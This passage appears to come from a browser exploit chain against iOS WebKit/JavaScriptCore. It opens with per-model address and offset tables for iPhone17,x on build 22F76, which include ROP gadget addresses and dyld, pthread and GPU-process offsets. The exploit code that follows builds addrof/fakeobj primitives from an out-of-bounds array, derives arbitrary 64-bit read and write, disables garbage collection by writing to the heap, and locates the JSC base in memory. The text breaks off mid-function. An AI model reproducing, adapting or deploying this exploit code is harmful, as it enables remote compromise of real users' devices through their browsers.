0x1ee7f7bc0n, 2341 HOMEUI_cstring: 0x182f79636n, 2342 IOSurfaceContextDelegate: 0x120n, 2343 IOSurfaceDrawable: 0x150n, 2344 IOSurfaceQueue: 0x48n, 2345 ImageIO__IIOLoadCMPhotoSymbols: 0x18865582cn, 2346 ImageIO__gFunc_CMPhotoCompressionCreateContainerFromImageExt: 0x1ed9c2df0n, 2347 ImageIO__gFunc_CMPhotoCompressionCreateDataContainerFromImage: 0x1ed9c2aa0n, 2348 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ed9c2aa8n, 2349 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ed9c2ab0n, 2350 ImageIO__gFunc_CMPhotoCompressionSessionAddCustomMetadata: 0x1ed9c29f0n, 2351 ImageIO__gFunc_CMPhotoCompressionSessionAddExif: 0x1ed9c2ab8n, 2352 ImageIO__gImageIOLogProc: 0x1ee9c0960n, 2353 JavaScriptCore__globalFuncParseFloat: 0x19a8755ecn, 2354 JavaScriptCore__jitAllowList: 0x1edb424a0n, 2355 JavaScriptCore__jitAllowList_once: 0x1edb422b8n, 2356 MediaAccessibility__MACaptionAppearanceGetDisplayType: 0x1bac3d744n, 2357 PerfPowerServicesReader_cstring: 0x257fc3e60n, 2358 RemoteGraphicsContextGLWorkQueue: 0x1eda63058n, 2359 RemoteRenderingBackendProxy_off: 0x830n, 2360 Security__SecKeychainBackupSyncable_block_invoke: 0x18b5db688n, 2361 Security__SecOTRSessionProcessPacketRemote_block_invoke: 0x18b5ef958n, 2362 Security__gSecurityd: 0x1eb683d78n, 2363 TextToSpeech__OBJC_CLASS__TtC12TextToSpeech27TTSMagicFirstPartyAudioUnit: 0x1edd91288n, 2364 UI_m_connection: 0x28n, 2365 WebCore__DedicatedWorkerGlobalScope_vtable: 0x1f1380f70n, 2366 WebCore__PAL_getPKContactClass: 0x1eda672b8n, 2367 WebCore__TelephoneNumberDetector_phoneNumbersScanner_value: 0x1eb922ed0n, 2368 WebCore__ZZN7WebCoreL29allScriptExecutionContextsMapEvE8contexts: 0x1eb8ddac8n, 2369 WebCore__initPKContact_once: 0x1eda6fdf8n, 2370 WebCore__initPKContact_value: 0x1eda6fe00n, 2371 WebCore__softLinkDDDFACacheCreateFromFramework: 0x1eda6e5c0n, 2372 WebCore__softLinkDDDFAScannerFirstResultInUnicharArray: 0x1eda6e5b8n, 2373 WebCore__softLinkMediaAccessibilityMACaptionAppearanceGetDisplayType: 0x1eda6e5a0n, 2374 WebCore__softLinkOTSVGOTSVGTableRelease: 0x1eeb4c548n, 2375 WebProcess_ensureGPUProcessConnection: 0x199199958n, 2376 WebProcess_gpuProcessConnectionClosed: 0x199aec2fcn, 2377 WebProcess_singleton: 0x1eda64200n, 2378 __pthread_head: 0x26a66c020n, 2379 dyld__RuntimeState_emptySlot: 0x1a9a79b6cn, 2380 dyld__RuntimeState_vtable: 0x1f2875aa0n, 2381 dyld__dlopen_from_lambda_ret: 0x1a9a37fc8n, 2382 dyld__signPointer: 0x1a9a433e4n, 2383 emptyString: 0x1edb18420n, 2384 free_slabs: 0x1ed9a9bd0n, 2385 gadget_control_1_ios184: 0x23f1202ecn, 2386 gadget_control_2_ios184: 0x1ad86ec28n, 2387 gadget_control_3_ios184: 0x21f28d150n, 2388 gadget_loop_1_ios184: 0x1865fc18cn, 2389 gadget_loop_2_ios184: 0x20d261da8n, 2390 gadget_loop_3_ios184: 0x184d2df1cn, 2391 gadget_set_all_registers_ios184: 0x20dfda16cn, 2392 jsc_base: 0x19a45e000n, 2393 libARI_cstring: 0x218aeb820n, 2394 libGPUCompilerImplLazy__invoker: 0x23cec57e8n, 2395 libGPUCompilerImplLazy_cstring: 0x23c00f870n, 2396 libdyld__dlopen: 0x1ad8707b8n, 2397 libdyld__dlsym: 0x1ad871a34n, 2398 libdyld__gAPIs: 0x1ed5bc000n, 2399 libsystem_c__atexit_mutex: 0x1ed8cf098n, 2400 libsystem_kernel__thread_suspend: 0x1d3da91c0n, 2401 libsystem_pthread_base: 0x20d2b0000n, 2402 m_backend: 0x70n, 2403 m_drawingArea: 0x50n, 2404 m_gpuProcessConnection: 0x158n, 2405 m_gpuProcessConnection_m_identifier: 0x38n, 2406 m_imageBuffer: 0x18n, 2407 m_isRenderingSuspended: 0xe8n, 2408 m_platformContext: 0x38n, 2409 m_remoteDisplayLists: 0x70n, 2410 m_remoteRenderingBackendMap: 0xe8n, 2411 m_webProcessConnections: 0x80n, 2412 mach_task_self_ptr: 0x1ed8ce300n, 2413 mainRunLoop: 0x1edb30020n, 2414 privateState_off: 0x7e8n, 2415 pthread_create_jsc: 0x19bd2af30n, 2416 pthread_create_offset: 0x6988n, 2417 runLoopHolder_tid: 0x1edb40708n, 2418 rxBufferMtl_off: 0x100n, 2419 rxMtlBuffer_off: 0x70n, 2420 vertexAttribVector_off: 0x2548n 2421 }, 2422 "iPhone17,3_22F76": { 2423 AVFAudio__AVLoadSpeechSynthesisImplementation_onceToken: 0x1edae3798n, 2424 AVFAudio__OBJC_CLASS__AVSpeechSynthesisMarker: 0x1edae3280n, 2425 AVFAudio__OBJC_CLASS__AVSpeechSynthesisProviderRequest: 0x1edae31e0n, 2426 AVFAudio__OBJC_CLASS__AVSpeechSynthesisVoice: 0x1edae3230n, 2427 AVFAudio__OBJC_CLASS__AVSpeechUtterance: 0x1edae2628n, 2428 AVFAudio__cfstr_SystemLibraryTextToSpeech: 0x1f195f658n, 2429 AXCoreUtilities__DefaultLoader: 0x1eb7c0be0n, 2430 CAPointer: 0x20n, 2431 CFNetwork__gConstantCFStringValueTable: 0x1ee9366e0n, 2432 CGContextDelegate: 0x28n, 2433 CMPhoto__CMPhotoCompressionCreateContainerFromImageExt: 0x1ac3ee428n, 2434 CMPhoto__CMPhotoCompressionCreateDataContainerFromImage: 0x1ac3ee580n, 2435 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ac3bdcb8n, 2436 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ac3be1e4n, 2437 CMPhoto__CMPhotoCompressionSessionAddCustomMetadata: 0x1ac3be748n, 2438 CMPhoto__CMPhotoCompressionSessionAddExif: 0x1ac3be304n, 2439 CMPhoto__kCMPhotoTranscodeOption_Strips: 0x1e80b1898n, 2440 DesktopServicesPriv_bss: 0x1ecca7a08n, 2441 Foundation__NSBundleTables_bundleTables_value: 0x1ed8f0348n, 2442 GPUConnectionToWebProcess_m_remoteGraphicsContextGLMap: 0xf0n, 2443 GPUProcess_singleton: 0x1eb928a98n, 2444 GetCurrentThreadTLSIndex_CurrentThreadIndex: 0x1ee7f7bc0n, 2445 HOMEUI_cstring: 0x182f79636n, 2446 IOSurfaceContextDelegate: 0x120n, 2447 IOSurfaceDrawable: 0x150n, 2448 IOSurfaceQueue: 0x48n, 2449 ImageIO__IIOLoadCMPhotoSymbols: 0x18865582cn, 2450 ImageIO__gFunc_CMPhotoCompressionCreateContainerFromImageExt: 0x1ed9c2cb0n, 2451 ImageIO__gFunc_CMPhotoCompressionCreateDataContainerFromImage: 0x1ed9c2960n, 2452 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ed9c2968n, 2453 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ed9c2970n, 2454 ImageIO__gFunc_CMPhotoCompressionSessionAddCustomMetadata: 0x1ed9c28b0n, 2455 ImageIO__gFunc_CMPhotoCompressionSessionAddExif: 0x1ed9c2978n, 2456 ImageIO__gImageIOLogProc: 0x1ee9c0960n, 2457 JavaScriptCore__globalFuncParseFloat: 0x19a8755ecn, 2458 JavaScriptCore__jitAllowList: 0x1edb424a0n, 2459 JavaScriptCore__jitAllowList_once: 0x1edb422b8n, 2460 MediaAccessibility__MACaptionAppearanceGetDisplayType: 0x1bac3d744n, 2461 PerfPowerServicesReader_cstring: 0x257fbfe60n, 2462 RemoteGraphicsContextGLWorkQueue: 0x1eda62f18n, 2463 RemoteRenderingBackendProxy_off: 0x830n, 2464 Security__SecKeychainBackupSyncable_block_invoke: 0x18b5db688n, 2465 Security__SecOTRSessionProcessPacketRemote_block_invoke: 0x18b5ef958n, 2466 Security__gSecurityd: 0x1eb683d78n, 2467 TextToSpeech__OBJC_CLASS__TtC12TextToSpeech27TTSMagicFirstPartyAudioUnit: 0x1edd91288n, 2468 UI_m_connection: 0x28n, 2469 WebCore__DedicatedWorkerGlobalScope_vtable: 0x1f1380f70n, 2470 WebCore__PAL_getPKContactClass: 0x1eda67178n, 2471 WebCore__TelephoneNumberDetector_phoneNumbersScanner_value: 0x1eb922ed0n, 2472 WebCore__ZZN7WebCoreL29allScriptExecutionContextsMapEvE8contexts: 0x1eb8ddac8n, 2473 WebCore__initPKContact_once: 0x1eda6fcb8n, 2474 WebCore__initPKContact_value: 0x1eda6fcc0n, 2475 WebCore__softLinkDDDFACacheCreateFromFramework: 0x1eda6e480n, 2476 WebCore__softLinkDDDFAScannerFirstResultInUnicharArray: 0x1eda6e478n, 2477 WebCore__softLinkMediaAccessibilityMACaptionAppearanceGetDisplayType: 0x1eda6e460n, 2478 WebCore__softLinkOTSVGOTSVGTableRelease: 0x1eeb4c548n, 2479 WebProcess_ensureGPUProcessConnection: 0x199199958n, 2480 WebProcess_gpuProcessConnectionClosed: 0x199aec2fcn, 2481 WebProcess_singleton: 0x1eda640c0n, 2482 __pthread_head: 0x26a01c020n, 2483 dyld__RuntimeState_emptySlot: 0x1a9a79b6cn, 2484 dyld__RuntimeState_vtable: 0x1f2875aa0n, 2485 dyld__dlopen_from_lambda_ret: 0x1a9a37fc8n, 2486 dyld__signPointer: 0x1a9a433e4n, 2487 emptyString: 0x1edb18420n, 2488 free_slabs: 0x1ed9a9a90n, 2489 gadget_control_1_ios184: 0x23f11c2ecn, 2490 gadget_control_2_ios184: 0x1ad86ec28n, 2491 gadget_control_3_ios184: 0x21f289150n, 2492 gadget_loop_1_ios184: 0x1865fc18cn, 2493 gadget_loop_2_ios184: 0x20d25dda8n, 2494 gadget_loop_3_ios184: 0x184d2df1cn, 2495 gadget_set_all_registers_ios184: 0x20dfd616cn, 2496 jsc_base: 0x19a45e000n, 2497 libARI_cstring: 0x218ae7820n, 2498 libGPUCompilerImplLazy__invoker: 0x23cec17e8n, 2499 libGPUCompilerImplLazy_cstring: 0x23c00b870n, 2500 libdyld__dlopen: 0x1ad8707b8n, 2501 libdyld__dlsym: 0x1ad871a34n, 2502 libdyld__gAPIs: 0x1ed5bc000n, 2503 libsystem_c__atexit_mutex: 0x1ed8cef58n, 2504 libsystem_kernel__thread_suspend: 0x1d3da91c0n, 2505 libsystem_pthread_base: 0x20d2ac000n, 2506 m_backend: 0x70n, 2507 m_drawingArea: 0x50n, 2508 m_gpuProcessConnection: 0x158n, 2509 m_gpuProcessConnection_m_identifier: 0x38n, 2510 m_imageBuffer: 0x18n, 2511 m_isRenderingSuspended: 0xe8n, 2512 m_platformContext: 0x38n, 2513 m_remoteDisplayLists: 0x70n, 2514 m_remoteRenderingBackendMap: 0xe8n, 2515 m_webProcessConnections: 0x80n, 2516 mach_task_self_ptr: 0x1ed8ce1c0n, 2517 mainRunLoop: 0x1edb30020n, 2518 privateState_off: 0x7e8n, 2519 pthread_create_jsc: 0x19bd2af30n, 2520 pthread_create_offset: 0x6988n, 2521 runLoopHolder_tid: 0x1edb40708n, 2522 rxBufferMtl_off: 0x100n, 2523 rxMtlBuffer_off: 0x70n, 2524 vertexAttribVector_off: 0x2548n 2525 }, 2526 "iPhone17,4_22F76": { 2527 AVFAudio__AVLoadSpeechSynthesisImplementation_onceToken: 0x1edae3798n, 2528 AVFAudio__OBJC_CLASS__AVSpeechSynthesisMarker: 0x1edae3280n, 2529 AVFAudio__OBJC_CLASS__AVSpeechSynthesisProviderRequest: 0x1edae31e0n, 2530 AVFAudio__OBJC_CLASS__AVSpeechSynthesisVoice: 0x1edae3230n, 2531 AVFAudio__OBJC_CLASS__AVSpeechUtterance: 0x1edae2628n, 2532 AVFAudio__cfstr_SystemLibraryTextToSpeech: 0x1f195f658n, 2533 AXCoreUtilities__DefaultLoader: 0x1eb7c0be0n, 2534 CAPointer: 0x20n, 2535 CFNetwork__gConstantCFStringValueTable: 0x1ee9366e0n, 2536 CGContextDelegate: 0x28n, 2537 CMPhoto__CMPhotoCompressionCreateContainerFromImageExt: 0x1ac3ee428n, 2538 CMPhoto__CMPhotoCompressionCreateDataContainerFromImage: 0x1ac3ee580n, 2539 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ac3bdcb8n, 2540 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ac3be1e4n, 2541 CMPhoto__CMPhotoCompressionSessionAddCustomMetadata: 0x1ac3be748n, 2542 CMPhoto__CMPhotoCompressionSessionAddExif: 0x1ac3be304n, 2543 CMPhoto__kCMPhotoTranscodeOption_Strips: 0x1e80b1898n, 2544 DesktopServicesPriv_bss: 0x1ecca7a08n, 2545 Foundation__NSBundleTables_bundleTables_value: 0x1ed8f0348n, 2546 GPUConnectionToWebProcess_m_remoteGraphicsContextGLMap: 0xf0n, 2547 GPUProcess_singleton: 0x1eb928a98n, 2548 GetCurrentThreadTLSIndex_CurrentThreadIndex: 0x1ee7f7bc0n, 2549 HOMEUI_cstring: 0x182f79636n, 2550 IOSurfaceContextDelegate: 0x120n, 2551 IOSurfaceDrawable: 0x150n, 2552 IOSurfaceQueue: 0x48n, 2553 ImageIO__IIOLoadCMPhotoSymbols: 0x18865582cn, 2554 ImageIO__gFunc_CMPhotoCompressionCreateContainerFromImageExt: 0x1ed9c2cb0n, 2555 ImageIO__gFunc_CMPhotoCompressionCreateDataContainerFromImage: 0x1ed9c2960n, 2556 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ed9c2968n, 2557 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ed9c2970n, 2558 ImageIO__gFunc_CMPhotoCompressionSessionAddCustomMetadata: 0x1ed9c28b0n, 2559 ImageIO__gFunc_CMPhotoCompressionSessionAddExif: 0x1ed9c2978n, 2560 ImageIO__gImageIOLogProc: 0x1ee9c0960n, 2561 JavaScriptCore__globalFuncParseFloat: 0x19a8755ecn, 2562 JavaScriptCore__jitAllowList: 0x1edb424a0n, 2563 JavaScriptCore__jitAllowList_once: 0x1edb422b8n, 2564 MediaAccessibility__MACaptionAppearanceGetDisplayType: 0x1bac3d744n, 2565 PerfPowerServicesReader_cstring: 0x257fbfe60n, 2566 RemoteGraphicsContextGLWorkQueue: 0x1eda62f18n, 2567 RemoteRenderingBackendProxy_off: 0x830n, 2568 Security__SecKeychainBackupSyncable_block_invoke: 0x18b5db688n, 2569 Security__SecOTRSessionProcessPacketRemote_block_invoke: 0x18b5ef958n, 2570 Security__gSecurityd: 0x1eb683d78n, 2571 TextToSpeech__OBJC_CLASS__TtC12TextToSpeech27TTSMagicFirstPartyAudioUnit: 0x1edd91288n, 2572 UI_m_connection: 0x28n, 2573 WebCore__DedicatedWorkerGlobalScope_vtable: 0x1f1380f70n, 2574 WebCore__PAL_getPKContactClass: 0x1eda67178n, 2575 WebCore__TelephoneNumberDetector_phoneNumbersScanner_value: 0x1eb922ed0n, 2576 WebCore__ZZN7WebCoreL29allScriptExecutionContextsMapEvE8contexts: 0x1eb8ddac8n, 2577 WebCore__initPKContact_once: 0x1eda6fcb8n, 2578 WebCore__initPKContact_value: 0x1eda6fcc0n, 2579 WebCore__softLinkDDDFACacheCreateFromFramework: 0x1eda6e480n, 2580 WebCore__softLinkDDDFAScannerFirstResultInUnicharArray: 0x1eda6e478n, 2581 WebCore__softLinkMediaAccessibilityMACaptionAppearanceGetDisplayType: 0x1eda6e460n, 2582 WebCore__softLinkOTSVGOTSVGTableRelease: 0x1eeb4c548n, 2583 WebProcess_ensureGPUProcessConnection: 0x199199958n, 2584 WebProcess_gpuProcessConnectionClosed: 0x199aec2fcn, 2585 WebProcess_singleton: 0x1eda640c0n, 2586 __pthread_head: 0x26a01c020n, 2587 dyld__RuntimeState_emptySlot: 0x1a9a79b6cn, 2588 dyld__RuntimeState_vtable: 0x1f2875aa0n, 2589 dyld__dlopen_from_lambda_ret: 0x1a9a37fc8n, 2590 dyld__signPointer: 0x1a9a433e4n, 2591 emptyString: 0x1edb18420n, 2592 free_slabs: 0x1ed9a9a90n, 2593 gadget_control_1_ios184: 0x23f11c2ecn, 2594 gadget_control_2_ios184: 0x1ad86ec28n, 2595 gadget_control_3_ios184: 0x21f289150n, 2596 gadget_loop_1_ios184: 0x1865fc18cn, 2597 gadget_loop_2_ios184: 0x20d25dda8n, 2598 gadget_loop_3_ios184: 0x184d2df1cn, 2599 gadget_set_all_registers_ios184: 0x20dfd616cn, 2600 jsc_base: 0x19a45e000n, 2601 libARI_cstring: 0x218ae7820n, 2602 libGPUCompilerImplLazy__invoker: 0x23cec17e8n, 2603 libGPUCompilerImplLazy_cstring: 0x23c00b870n, 2604 libdyld__dlopen: 0x1ad8707b8n, 2605 libdyld__dlsym: 0x1ad871a34n, 2606 libdyld__gAPIs: 0x1ed5bc000n, 2607 libsystem_c__atexit_mutex: 0x1ed8cef58n, 2608 libsystem_kernel__thread_suspend: 0x1d3da91c0n, 2609 libsystem_pthread_base: 0x20d2ac000n, 2610 m_backend: 0x70n, 2611 m_drawingArea: 0x50n, 2612 m_gpuProcessConnection: 0x158n, 2613 m_gpuProcessConnection_m_identifier: 0x38n, 2614 m_imageBuffer: 0x18n, 2615 m_isRenderingSuspended: 0xe8n, 2616 m_platformContext: 0x38n, 2617 m_remoteDisplayLists: 0x70n, 2618 m_remoteRenderingBackendMap: 0xe8n, 2619 m_webProcessConnections: 0x80n, 2620 mach_task_self_ptr: 0x1ed8ce1c0n, 2621 mainRunLoop: 0x1edb30020n, 2622 privateState_off: 0x7e8n, 2623 pthread_create_jsc: 0x19bd2af30n, 2624 pthread_create_offset: 0x6988n, 2625 runLoopHolder_tid: 0x1edb40708n, 2626 rxBufferMtl_off: 0x100n, 2627 rxMtlBuffer_off: 0x70n, 2628 vertexAttribVector_off: 0x2548n 2629 }, 2630 "iPhone17,5_22F76": { 2631 AVFAudio__AVLoadSpeechSynthesisImplementation_onceToken: 0x1edadf798n, 2632 AVFAudio__OBJC_CLASS__AVSpeechSynthesisMarker: 0x1edadf280n, 2633 AVFAudio__OBJC_CLASS__AVSpeechSynthesisProviderRequest: 0x1edadf1e0n, 2634 AVFAudio__OBJC_CLASS__AVSpeechSynthesisVoice: 0x1edadf230n, 2635 AVFAudio__OBJC_CLASS__AVSpeechUtterance: 0x1edade628n, 2636 AVFAudio__cfstr_SystemLibraryTextToSpeech: 0x1f195b658n, 2637 AXCoreUtilities__DefaultLoader: 0x1eb7bcbe0n, 2638 CAPointer: 0x20n, 2639 CFNetwork__gConstantCFStringValueTable: 0x1ee9326e0n, 2640 CGContextDelegate: 0x28n, 2641 CMPhoto__CMPhotoCompressionCreateContainerFromImageExt: 0x1ac3ea428n, 2642 CMPhoto__CMPhotoCompressionCreateDataContainerFromImage: 0x1ac3ea580n, 2643 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ac3b9cb8n, 2644 CMPhoto__CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ac3ba1e4n, 2645 CMPhoto__CMPhotoCompressionSessionAddCustomMetadata: 0x1ac3ba748n, 2646 CMPhoto__CMPhotoCompressionSessionAddExif: 0x1ac3ba304n, 2647 CMPhoto__kCMPhotoTranscodeOption_Strips: 0x1e80ad898n, 2648 DesktopServicesPriv_bss: 0x1ecca3a08n, 2649 Foundation__NSBundleTables_bundleTables_value: 0x1ed8ec348n, 2650 GPUConnectionToWebProcess_m_remoteGraphicsContextGLMap: 0xf0n, 2651 GPUProcess_singleton: 0x1eb924a98n, 2652 GetCurrentThreadTLSIndex_CurrentThreadIndex: 0x1ee7f3bc0n, 2653 HOMEUI_cstring: 0x182f75636n, 2654 IOSurfaceContextDelegate: 0x120n, 2655 IOSurfaceDrawable: 0x150n, 2656 IOSurfaceQueue: 0x48n, 2657 ImageIO__IIOLoadCMPhotoSymbols: 0x18865182cn, 2658 ImageIO__gFunc_CMPhotoCompressionCreateContainerFromImageExt: 0x1ed9becb0n, 2659 ImageIO__gFunc_CMPhotoCompressionCreateDataContainerFromImage: 0x1ed9be960n, 2660 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImage: 0x1ed9be968n, 2661 ImageIO__gFunc_CMPhotoCompressionSessionAddAuxiliaryImageFromDictionaryRepresentation: 0x1ed9be970n, 2662 ImageIO__gFunc_CMPhotoCompressionSessionAddCustomMetadata: 0x1ed9be8b0n, 2663 ImageIO__gFunc_CMPhotoCompressionSessionAddExif: 0x1ed9be978n, 2664 ImageIO__gImageIOLogProc: 0x1ee9bc960n, 2665 JavaScriptCore__globalFuncParseFloat: 0x19a8715ecn, 2666 JavaScriptCore__jitAllowList: 0x1edb3e4a0n, 2667 JavaScriptCore__jitAllowList_once: 0x1edb3e2b8n, 2668 MediaAccessibility__MACaptionAppearanceGetDisplayType: 0x1bac39744n, 2669 PerfPowerServicesReader_cstring: 0x257fb7e60n, 2670 RemoteGraphicsContextGLWorkQueue: 0x1eda5ef18n, 2671 RemoteRenderingBackendProxy_off: 0x830n, 2672 Security__SecKeychainBackupSyncable_block_invoke: 0x18b5d7688n, 2673 Security__SecOTRSessionProcessPacketRemote_block_invoke: 0x18b5eb958n, 2674 Security__gSecurityd: 0x1eb67fd78n, 2675 TextToSpeech__OBJC_CLASS__TtC12TextToSpeech27TTSMagicFirstPartyAudioUnit: 0x1edd8d288n, 2676 UI_m_connection: 0x28n, 2677 WebCore__DedicatedWorkerGlobalScope_vtable: 0x1f137cf70n, 2678 WebCore__PAL_getPKContactClass: 0x1eda63178n, 2679 WebCore__TelephoneNumberDetector_phoneNumbersScanner_value: 0x1eb91eed0n, 2680 WebCore__ZZN7WebCoreL29allScriptExecutionContextsMapEvE8contexts: 0x1eb8d9ac8n, 2681 WebCore__initPKContact_once: 0x1eda6bcb8n, 2682 WebCore__initPKContact_value: 0x1eda6bcc0n, 2683 WebCore__softLinkDDDFACacheCreateFromFramework: 0x1eda6a480n, 2684 WebCore__softLinkDDDFAScannerFirstResultInUnicharArray: 0x1eda6a478n, 2685 WebCore__softLinkMediaAccessibilityMACaptionAppearanceGetDisplayType: 0x1eda6a460n, 2686 WebCore__softLinkOTSVGOTSVGTableRelease: 0x1eeb48548n, 2687 WebProcess_ensureGPUProcessConnection: 0x199195958n, 2688 WebProcess_gpuProcessConnectionClosed: 0x199ae82fcn, 2689 WebProcess_singleton: 0x1eda600c0n, 2690 __pthread_head: 0x269d78020n, 2691 dyld__RuntimeState_emptySlot: 0x1a9a75b6cn, 2692 dyld__RuntimeState_vtable: 0x1f2871aa0n, 2693 dyld__dlopen_from_lambda_ret: 0x1a9a33fc8n, 2694 dyld__signPointer: 0x1a9a3f3e4n, 2695 emptyString: 0x1edb14420n, 2696 free_slabs: 0x1ed9a5a90n, 2697 gadget_control_1_ios184: 0x23f1142ecn, 2698 gadget_control_2_ios184: 0x1ad86ac28n, 2699 gadget_control_3_ios184: 0x21f281150n, 2700 gadget_loop_1_ios184: 0x1865f818cn, 2701 gadget_loop_2_ios184: 0x20d255da8n, 2702 gadget_loop_3_ios184: 0x184d29f1cn, 2703 gadget_set_all_registers_ios184: 0x20dfce16cn, 2704 jsc_base: 0x19a45a000n, 2705 libARI_cstring: 0x218adf820n, 2706 libGPUCompilerImplLazy__invoker: 0x23ceb97e8n, 2707 libGPUCompilerImplLazy_cstring: 0x23c003870n, 2708 libdyld__dlopen: 0x1ad86c7b8n, 2709 libdyld__dlsym: 0x1ad86da34n, 2710 libdyld__gAPIs: 0x1ed5b8000n, 2711 libsystem_c__atexit_mutex: 0x1ed8caf58n, 2712 libsystem_kernel__thread_suspend: 0x1d3da51c0n, 2713 libsystem_pthread_base: 0x20d2a4000n, 2714 m_backend: 0x70n, 2715 m_drawingArea: 0x50n, 2716 m_gpuProcessConnection: 0x158n, 2717 m_gpuProcessConnection_m_identifier: 0x38n, 2718 m_imageBuffer: 0x18n, 2719 m_isRenderingSuspended: 0xe8n, 2720 m_platformContext: 0x38n, 2721 m_remoteDisplayLists: 0x70n, 2722 m_remoteRenderingBackendMap: 0xe8n, 2723 m_webProcessConnections: 0x80n, 2724 mach_task_self_ptr: 0x1ed8ca1c0n, 2725 mainRunLoop: 0x1edb2c020n, 2726 privateState_off: 0x7e8n, 2727 pthread_create_jsc: 0x19bd26f30n, 2728 pthread_create_offset: 0x6988n, 2729 runLoopHolder_tid: 0x1edb3c708n, 2730 rxBufferMtl_off: 0x100n, 2731 rxMtlBuffer_off: 0x70n, 2732 vertexAttribVector_off: 0x2548n 2733 } 2734 }; 2735 2736 2737 function sleep(time) { 2738 return new Promise((resolve) => setTimeout(resolve, time)); 2739 } 2740 var globalFuncParseFloat = 0n; 2741 var maximum_id = 0n; 2742 const wait_for_jit_compilation_ms = 1100; 2743 2744 class check_attempt { 2745 constructor() { 2746 this.overlap_array; 2747 this.overlap_idx_in_oob_array; 2748 this.oob_array; 2749 this.read32; 2750 this.read64; 2751 this.write64; 2752 } 2753 2754 stage1() { 2755 this.overlap_array[0] = {}; 2756 let overlap_array = this.overlap_array; 2757 let overlap_idx_in_oob_array = this.overlap_idx_in_oob_array; 2758 let oob_array = this.oob_array; 2759 2760 function addrof(object) { 2761 overlap_array[0] = object; 2762 return BigInt.fromDouble(oob_array[overlap_idx_in_oob_array]); 2763 } 2764 function fakeobj(addr) { 2765 oob_array[overlap_idx_in_oob_array] = addr.asDouble(); 2766 return overlap_array[0]; 2767 } 2768 2769 let junk0 = new Array(4).fill(1.1); 2770 junk0[0] = 1.1; 2771 junk0[1] = 1.1; 2772 let scribble_element = new Array(4).fill(1.1); 2773 scribble_element[0] = 1.1; 2774 scribble_element[1] = 1.1; 2775 let results = new Array(2).fill(1.1); 2776 results[0] = 1.1; 2777 results[1] = 1.1; 2778 let change_scribble_holder = { p1: fakeobj(0x0108240700006000n), p2: scribble_element }; 2779 let change_scribble = fakeobj(addrof(change_scribble_holder) + 0x10n); 2780 for (let i = 0; i < 2; i++) { 2781 let a = i == 0 ? change_scribble : junk0; 2782 results[i] = a[0]; 2783 } 2784 change_scribble_holder.p1 = results[0]; //now we have a valid structureID 2785 2786 scribble_element.p3 = 1.1; 2787 scribble_element[0] = 1.1; 2788 2789 let double_array_cell = BigInt.fromDouble(change_scribble[0]); 2790 change_scribble_holder.p1 = fakeobj(double_array_cell); 2791 const original_cell = change_scribble[0]; 2792 2793 function write64(addr, value) { 2794 change_scribble[0] = original_cell; 2795 change_scribble[1] = (addr + 0x10n).asDouble(); 2796 2797 if (value === 0n) { 2798 scribble_element.p3 = 1; 2799 delete scribble_element.p3; 2800 } else if (value < 0x2000000000000n) { 2801 scribble_element.p3 = fakeobj(value); 2802 } else if (value <= 0x7ff2000000000000n || value >= 0x8002000000000000n && value <= 0xfff0000000000000n) { 2803 scribble_element.p3 = value.sub(0x2000000000000n).asDouble(); 2804 } else { 2805 let off_addr = addr.add(8n); 2806 let off_val = read64(off_addr); 2807 let [hi, lo] = value.asInt32s(); 2808 2809 scribble_element.p3 = hi; 2810 change_scribble[1] = (addr + 0x14n).asDouble(); 2811 scribble_element.p3 = lo; 2812 2813 write64(off_addr, off_val); 2814 } 2815 } 2816 2817 let read64_biguint64arr = new BigUint64Array(4); 2818 change_scribble[1] = addrof(read64_biguint64arr).add(8n).asDouble(); 2819 let read64_float64arr_bytes = BigInt.fromDouble(scribble_element[1]); 2820 read64_biguint64arr[0] = 0x10000000006n; 2821 read64_biguint64arr[1] = read64_float64arr_bytes.add(0x10n); 2822 let read64_str = '\u4444'.repeat(0x10); 2823 [][read64_str]; 2824 change_scribble[1] = addrof(read64_str).add(8n).asDouble(); 2825 scribble_element[0] = read64_float64arr_bytes.asDouble(); 2826 2827 function read64(addr) { 2828 read64_biguint64arr[1] = addr; 2829 return (BigInt(read64_str.charCodeAt(0)) 2830 | BigInt(read64_str.charCodeAt(1)) << 16n 2831 | BigInt(read64_str.charCodeAt(2)) << 32n 2832 | BigInt(read64_str.charCodeAt(3)) << 48n); 2833 } 2834 2835 function read32(addr) { 2836 read64_biguint64arr[1] = addr; 2837 2838 return (BigInt(read64_str.charCodeAt(0)) 2839 | BigInt(read64_str.charCodeAt(1)) << 16n); 2840 } 2841 this.read32 = read32; 2842 this.read64 = read64; 2843 this.write64 = write64; 2844 // Disable Worklet GC 2845 const vm = read64(read64(addrof(globalThis).add(0x10n)).add(0x38n)); 2846 2847 const heap = vm.add(0xc0n); 2848 const isSafeToCollect = heap.add(0x241n); 2849 write64(isSafeToCollect, 0n); 2850 2851 const executable = read64(addrof(parseFloat) + 0x18n); 2852 globalFuncParseFloat = read64(executable + 0x28n).noPAC(); 2853 const jsc_base = (function() { 2854 let jsc_base = globalFuncParseFloat & ~0xfffn; 2855 2856 while (1) { 2857 read64_biguint64arr[1] = jsc_base; 2858 if (read64_str.charCodeAt(0) == 0xfacf && read64_str.charCodeAt(1) == 0xfeed) { 2859 return jsc_base; 2860 } 2861 jsc_base -= 0x1000n; 2862 } 2863 })(); 2864 print("jsc_base: " + jsc_base.hex()); 2865 function parse_adrp(addr) { 2866 const x = Number(read32(addr)); 2867 const immhi = x >> 5 & (1 << 23 - 5 + 1) - 1; 2868 const immlo = x >> 29 & 3; 2869 const imm = immhi << 14 | immlo << 12; 2870 return imm + 